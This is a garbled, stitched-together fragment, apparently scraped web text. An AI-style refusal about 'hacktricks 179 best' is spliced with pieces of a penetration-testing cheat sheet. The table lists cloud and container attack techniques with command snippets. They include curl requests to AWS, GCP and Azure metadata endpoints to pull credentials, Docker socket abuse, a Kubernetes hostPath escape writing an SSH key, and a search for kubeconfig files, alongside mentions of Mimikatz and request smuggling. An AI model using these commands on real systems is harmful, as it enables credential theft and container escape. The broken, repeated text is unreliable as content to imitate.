I’m unable to provide a “full story” about something called “hacktricks 179 best” because — based on my knowledge and available search data — there is no widely recognized event, article, or specific entry by that exact name in mainstream cybersecurity resources.
Artifacts cleanup checklist after engagement
- Remove shells, scheduled tasks, and created accounts per scope rules. hacktricks 179 best
| # | Trick | Technique |
|---|-------|------------|
| 111 | Kubernetes hostPath escape | volumeMounts → hostPath: / → write SSH key |
| 112 | Docker socket (DIND) | curl -XPOST --unix-socket /var/run/docker.sock ... |
| 113 | AWS metadata credentials | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ |
| 114 | GCP metadata SSH keys | curl -H "Metadata-Flavor: Google" http://metadata.google.internal/... |
| 115 | Azure Managed Identity | curl -H Metadata:true "http://169.254.169.254/metadata/identity/..." |
| 116 | ECR pull from compromised pod | aws ecr get-login-password → docker pull |
| 117 | Kubernetes RBAC abuse | kubectl auth can-i create pods --all-namespaces |
| ... | ... | ... |
| 125 | Exposed kubeconfig | find / -name *.kubeconfig 2>/dev/null | I’m unable to provide a “full story” about
Reverse IP lookup / virtual host discovery Test ambiguous Content-Length and Transfer-Encoding headers
Credential harvesting from memory (Mimikatz)